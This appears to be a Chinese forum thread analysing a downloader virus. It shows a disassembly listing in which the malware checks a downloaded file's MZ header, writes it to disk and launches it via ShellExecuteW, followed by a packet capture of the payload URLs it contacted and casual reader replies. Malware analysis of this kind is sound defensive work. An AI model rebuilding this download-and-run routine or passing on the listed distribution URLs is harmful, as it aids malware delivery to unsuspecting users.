004028D7 .8B45 BC mov eax, dword ptr
004028DA .8B00 mov eax, dword ptr
004028DC .66:3D 4D5A cmp ax, 5A4D ;判断下载完的程序的DOS头
004028E0 .0F84 8E000000 je 00402974
...
00402976 .50 push eax
00402977 .68 80000000 push 80
0040297C .6A 02 push 2
0040297E .50 push eax
0040297F .6A 02 push 2
00402981 .68 00000040 push 40000000
00402986 .8B45 A8 mov eax, dword ptr
00402989 .B4 04 mov ah, 4
0040298B .FF55 04 call dword ptr
0040298E .8ACC mov cl, ah
00402990 .FF55 08 call dword ptr
00402993 .50 push eax
00402994 .FF55 50 call dword ptr ;CreateFileW
00402997 .8BF8 mov edi, eax
00402999 .33C0 xor eax, eax
0040299B .50 push eax
0040299C .8D45 C4 lea eax, dword ptr
0040299F .50 push eax
004029A0 .FF75 E0 push dword ptr
004029A3 .FF75 9C push dword ptr
004029A6 .57 push edi
004029A7 .FF55 48 call dword ptr ;WriteFile
004029AA .57 push edi
004029AB .FF55 38 call dword ptr ;CloseHandle
004029AE .8B75 F4 mov esi, dword ptr
004029B1 .56 push esi
004029B2 .51 push ecx
004029B3 .FF55 40 call dword ptr ;GetCurrentDirectoryW
004029B6 .8B45 A8 mov eax, dword ptr
004029B9 .B4 04 mov ah, 4
004029BB .FF55 04 call dword ptr
004029BE .8ACC mov cl, ah
004029C0 .FF55 08 call dword ptr
004029C3 .50 push eax
004029C4 .56 push esi
004029C5 .B9 01000000 mov ecx, 1
004029CA .FF55 08 call dword ptr
004029CD .50 push eax
004029CE .56 push esi
004029CF .FF55 6C call dword ptr ;swprintf
004029D2 .83C4 18 add esp, 18
004029D5 .33FF xor edi, edi
004029D7 .57 push edi
004029D8 .57 push edi
004029D9 .57 push edi
004029DA .56 push esi
004029DB .B9 02000000 mov ecx, 2
004029E0 .FF55 08 call dword ptr
004029E3 .50 push eax
004029E4 .57 push edi
004029E5 .FF55 0C call dword ptr ;shell32.ShellExecuteW
封包抓的数据
http://etaxiuae.com/uploads/h76id30.zip
http://porfintengoweb.com/css/11s1.zip
http://jc-charge-it.nl/pages/11s1.zip
http://etaxiuae.com/uploads/h76id30.zip
http://porfintengoweb.com/css/11s1.zip
http://jc-charge-it.nl/pages/11s1.zip
http://etaxiuae.com/uploads/h76id30.zip
http://porfintengoweb.com/css/11s1.zip
http://jc-charge-it.nl/pages/11s1.zip
http://etaxiuae.com/uploads/h76id30.zip
http://porfintengoweb.com/css/11s1.zip
http://jc-charge-it.nl/pages/11s1.zip
http://etaxiuae.com/uploads/h76id30.zip
http://porfintengoweb.com/css/11s1.zip
http://jc-charge-it.nl/pages/11s1.zip
http://etaxiuae.com/uploads/h76id30.zip
http://porfintengoweb.com/css/11s1.zip
http://jc-charge-it.nl/pages/11s1.zip
http://etaxiuae.com/uploads/h76id30.zip
http://porfintengoweb.com/css/11s1.zip
http://jc-charge-it.nl/pages/11s1.zip
http://etaxiuae.com/uploads/h76id30.zip
不过这些地址貌似者失效了,下载不下来。
总体来上这个病毒还是比较简单的。
Hmily 发表于 2014-8-25 17:53
你这个格式咋看起来这么恶心。。。
我正在改格式... 你这个格式咋看起来这么恶心。。。 虽然看不懂但我居然看完了 太深奥 没看明白 好牛逼,我是用户大大,膜拜了,虽然我看不懂 看到大牛在这里膜拜之 谢谢咯 感谢分享经验 我来学习一下 {:1_932:}膜拜用户大{:1_931:},前排留名